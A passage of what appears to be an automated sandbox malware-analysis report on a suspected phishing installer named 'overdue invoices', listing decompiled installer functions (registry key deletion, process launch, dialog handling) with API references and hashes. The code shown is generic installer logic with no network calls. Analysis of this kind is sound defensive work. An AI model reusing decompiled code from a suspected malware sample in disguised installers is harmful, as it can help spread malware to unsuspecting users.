                  • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                    • Part of subcall function 00402BA9: MulDiv.KERNEL32(00000000,00000064,000002F9), ref: 00402BBE
                  • wsprintfA.USER32 ref: 00402C29
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                    • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                    • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                    • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                    • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                  • String ID: ... %d%%
                  • API String ID: 632923820-2449383134
                  • Opcode ID: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                  • Instruction ID: 259a824e759da58d6bdbd9050b41674a690fb301749dacda7e517d53f8420425
                  • Opcode Fuzzy Hash: 9ac0c74c1306bbd1fe40de56f6429fb106574e4c029b9f6bcf9b72350caeebfb
                  • Instruction Fuzzy Hash: 29019270909224EBDB216F60EF4C99F7B78AB047017104137F801B12D1C6BCA986C6EE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00402A28 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 84%
                  			E00402A28(void* _a4, char* _a8, long _a12) {
				void* _v8;
				char _v272;
				signed char _t16;
				long _t18;
				long _t25;
				intOrPtr* _t27;
				long _t28;

				_t16 =  *0x423f50; // 0x0
				_t18 = RegOpenKeyExA(_a4, _a8, 0, _t16 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						__eflags = _a12;
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							__eflags = 1;
							return 1;
						}
						_t25 = E00402A28(_v8,  &_v272, 0);
						__eflags = _t25;
						if(_t25 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DA3(2);
					if(_t27 == 0) {
						__eflags =  *0x423f50; // 0x0
						if(__eflags != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						__eflags = _t28;
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423f50, 0);
				}
				return _t18;
			}










                  0x00402a38
                  0x00402a49
                  0x00402a51
                  0x00402a79
                  0x00402a60
                  0x00402a63
                  0x00402ab3
                  0x00402ab9
                  0x00402abb
                  0x00000000
                  0x00402abb
                  0x00402a70
                  0x00402a75
                  0x00402a77
                  0x00000000
                  0x00000000
                  0x00402a77
                  0x00402a8e
                  0x00402a96
                  0x00402a9d
                  0x00402ac3
                  0x00402ac9
                  0x00000000
                  0x00000000
                  0x00402ad1
                  0x00402ad7
                  0x00402ad9
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402ad9
                  0x00000000
                  0x00402aac
                  0x00402ac0

                  APIs
                  • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A49
                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402A85
                  • RegCloseKey.ADVAPI32(?), ref: 00402A8E
                  • RegCloseKey.ADVAPI32(?), ref: 00402AB3
                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AD1
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Close$DeleteEnumOpen
                  • String ID:
                  • API String ID: 1912718029-0
                  • Opcode ID: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                  • Instruction ID: 7ac3799e0b9b7f286de12d9a89f233b53136cfd59643404f79253a10a0ceffad
                  • Opcode Fuzzy Hash: 188da090bc2c0dda3339140851fe508e253b0801d39640d6a2b0d173e59915d9
                  • Instruction Fuzzy Hash: AA115931A00009FEDF21AF90DE48DAB3B79EB44395B104536BA05A01A0DB749E51AE69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401CC1 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00401CC1(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029E8(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                  0x00401ccb
                  0x00401cd2
                  0x00401d01
                  0x00401d09
                  0x00401d10
                  0x00401d10
                  0x00402880
                  0x0040288c

                  APIs
                  • GetDlgItem.USER32 ref: 00401CC5
                  • GetClientRect.USER32 ref: 00401CD2
                  • LoadImageA.USER32 ref: 00401CF3
                  • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                  • DeleteObject.GDI32(00000000), ref: 00401D10
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                  • String ID:
                  • API String ID: 1849352358-0
                  • Opcode ID: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                  • Instruction ID: ad5020e38ef11d08f371025551c7f23f007b957d45941c5b52acf933ea75ddf9
                  • Opcode Fuzzy Hash: 93d2110668d3094e167584d1b1b6540c5cd1076fe79007bc13e6d0e6a309afb7
                  • Instruction Fuzzy Hash: 31F0F9B2A04105BFD700EBA4EE89DAFB7BDEB44341B104476F601F21A0C7789D018B29
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00404610 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 51%
                  			E00404610(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405AA7(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405AA7(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405AA7(_t34, 0, 0x420498, 0x420498, _a8);
				wsprintfA(_t26 + lstrlenA(0x420498), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x420498);
			}













                  0x00404618
                  0x0040461c
                  0x00404624
                  0x00404627
                  0x00404628
                  0x0040462a
                  0x0040462c
                  0x0040462f
                  0x0040462f
                  0x00404636
                  0x0040463c
                  0x0040463c
                  0x00404643
                  0x0040464e
                  0x0040464f
                  0x00404652
                  0x00404652
                  0x0040465f
                  0x0040466a
                  0x0040466d
                  0x0040467f
                  0x00404686
                  0x00404687
                  0x00404696
                  0x004046a6
                  0x004046c2

                  APIs
                  • lstrlenA.KERNEL32(00420498,00420498,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404530,000000DF,0000040F,00000400,00000000), ref: 0040469E
                  • wsprintfA.USER32 ref: 004046A6
                  • SetDlgItemTextA.USER32 ref: 004046B9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: ItemTextlstrlenwsprintf
                  • String ID: %u.%u%s%s
                  • API String ID: 3540041739-3551169577
                  • Opcode ID: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                  • Instruction ID: 4c66ffa9968b47036da968d2f23bae361eeba693da1d293f62fa9500f86314f5
                  • Opcode Fuzzy Hash: 219ed5be34c024fa703789d7f3e0b0a15268edc71ac5e8557b1e6afa8892d270
                  • Instruction Fuzzy Hash: 6211E6737001243BDB10A5699C45EAF3299DBC2335F14423BF625F61D1E9798C1186A9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401BAD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 51%
                  			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029CB(3);
				 *(_t55 + 8) = E004029CB(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029E8(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029E8(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029E8();
					_t28 = E004029E8();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029CB();
					_t37 = E004029CB();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E004059E3();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                  0x00401bb6
                  0x00401bc2
                  0x00401bc5
                  0x00401bce
                  0x00401bce
                  0x00401bd1
                  0x00401bd5
                  0x00401bde
                  0x00401bde
                  0x00401be1
                  0x00401be5
                  0x00401be7
                  0x00401c34
                  0x00401c36
                  0x00401c3f
                  0x00401c47
                  0x00401c4a
                  0x00401c4a
                  0x00401c53
                  0x00000000
                  0x00401be9
                  0x00401bf0
                  0x00401bf2
                  0x00401bfa
                  0x00401bfd
                  0x00401c25
                  0x00401c59
                  0x00401c59
                  0x00401bff
                  0x00401c0d
                  0x00401c15
                  0x00401c18
                  0x00401c18
                  0x00401bfd
                  0x00401c5c
                  0x00401c5f
                  0x00401c65
                  0x00402825
                  0x00402825
                  0x00402880
                  0x0040288c

                  APIs
                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: MessageSend$Timeout
                  • String ID: !
                  • API String ID: 1777923405-2657877971
                  • Opcode ID: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                  • Instruction ID: c520659e647c29be31daea63823ecf32d675036654070bdfdaec67237a792274
                  • Opcode Fuzzy Hash: 334588288cfdb17ff4757290809a1857d889fbbcabb1089515c2e64beeb01a29
                  • Instruction Fuzzy Hash: 902183B1A44104BEDF01AFB5CE5BAAD7A75EF45704F14047AF501B61D1D6B88940D728
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00403897 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00403897(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				intOrPtr _t15;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E004059FC(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4; // 0x1
					if(_t26 == 0) {
						goto L7;
					}
					_t15 =  *0x423eb0; // 0x55dba8
					_t16 =  *(_t15 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E004059E3(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420470, E00405AA7(_t13, _t24, _t26, "vmklrdjtbsiifoh Setup", 0xfffffffe));
						_t11 =  *0x423ecc; // 0x3
						_t27 =  *0x423ec8; // 0x55dd54
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t5 = _t27 + 0x18; // 0x55dd6c
								_t11 = E00405AA7(_t13, _t25, _t27, _t5, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}

















                  0x0040389b
                  0x004038a0
                  0x004038a6
                  0x004038ab
                  0x004038ab
                  0x004038b3
                  0x00000000
                  0x00000000
                  0x004038b5
                  0x004038bb
                  0x004038c3
                  0x004038c5
                  0x004038cb
                  0x004038cb
                  0x004038cd
                  0x004038d9
                  0x00000000
                  0x00000000
                  0x004038dd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004038df
                  0x004038e4
                  0x004038ed
                  0x004038f3
                  0x004038f8
                  0x0040390c
                  0x00403917
                  0x0040392f
                  0x00403935
                  0x0040393a
                  0x00403942
                  0x00403963
                  0x00403963
                  0x00403963
                  0x00403944
                  0x00403946
                  0x00403946
                  0x0040394a
                  0x0040394d
                  0x00403951
                  0x00403951
                  0x00403956
                  0x0040395c
                  0x0040395c
                  0x00000000
                  0x00403946
                  0x004038fa
                  0x004038ff
                  0x00403908
                  0x00403901
                  0x00403901
                  0x00403901
                  0x004038ff

                  APIs
                  • SetWindowTextA.USER32(00000000,vmklrdjtbsiifoh Setup), ref: 0040392F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: TextWindow
                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\$vmklrdjtbsiifoh Setup
                  • API String ID: 530164218-1302341837
                  • Opcode ID: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                  • Instruction ID: 77a07bfd4d582853364bfe0cce575c4745298431d34a1254bec181f891eb0756
                  • Opcode Fuzzy Hash: 79dbb7d0da1226e987bea17a70b9353cd826d311687ab2bcae082b141bbcb9ba
                  • Instruction Fuzzy Hash: 3611C271B005119BC334AF15D880A373BBDEF84726369827BE901A73A1C77E9E039A58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004052E5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004052E5(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a0->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a0,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                  0x004052ee
                  0x0040530a
                  0x00405312
                  0x00405317
                  0x00000000
                  0x0040531d
                  0x00405321

                  APIs
                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A0,Error launching installer), ref: 0040530A
                  • CloseHandle.KERNEL32(?), ref: 00405317
                  Strings
                  • Error launching installer, xrefs: 004052F8
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004052E5
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: CloseCreateHandleProcess
                  • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                  • API String ID: 3712363035-4043152584
                  • Opcode ID: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                  • Instruction ID: 638c90c2c8bd3d8652662e5a24b63cb160f6dc818783434175b306b50d96cec4
                  • Opcode Fuzzy Hash: 6b6a0bc2a3a2861d1b4fb8cb28cdb7ee12dd8b27d4ddea3b465ed8bf02dd5c13
                  • Instruction Fuzzy Hash: 32E0ECB4A00209BFDB00AF64ED09B6F7BBCFB04348F808522A911E2150D7B4E8148A69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00405578 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00405578(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40900c);
				}
				return _t7;
			}




                  0x00405579
                  0x00405590
                  0x00405598
                  0x00405598
                  0x004055a0

                  APIs
                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 0040557E
                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040320F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405587
                  • lstrcatA.KERNEL32(?,0040900C), ref: 00405598
                  Strings
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405578
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: CharPrevlstrcatlstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\
                  • API String ID: 2659869361-3936084776
                  • Opcode ID: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                  • Instruction ID: 4689f4cb8dc724d8b29f049f697397264ef60a28c46f00026a2de7c751f5ddbe
                  • Opcode Fuzzy Hash: 103a7f091eca4e356757d037532255daa0bd9c7b09fb9152348cdcff170487b5
                  • Instruction Fuzzy Hash: 17D0A962609A307EE20222159C05ECB2A08CF42301B048022F500B62D2C33C4D418FFE
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00401EC5 Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029E8(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x40900c, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E004059E3(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E004059E3(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                  0x00401ec7
                  0x00401ecf
                  0x00401ed4
                  0x00401ed9
                  0x00401edd
                  0x00401ee0
                  0x00401ee2
                  0x00401ee9
                  0x00401ef2
                  0x00401efa
                  0x00401efd
                  0x00401f12
                  0x00401f18
                  0x00401f2b
                  0x00401f34
                  0x00401f40
                  0x00401f45
                  0x00401f45
                  0x00401f2b
                  0x00401f48
                  0x00401b75
                  0x00401b75
                  0x00401efd
                  0x00402880
                  0x0040288c

                  APIs
                  • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                  • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                  • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                  • VerQueryValueA.VERSION(?,0040900C,?,?,?,?,?,00000000), ref: 00401F24
                    • Part of subcall function 004059E3: wsprintfA.USER32 ref: 004059F0
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
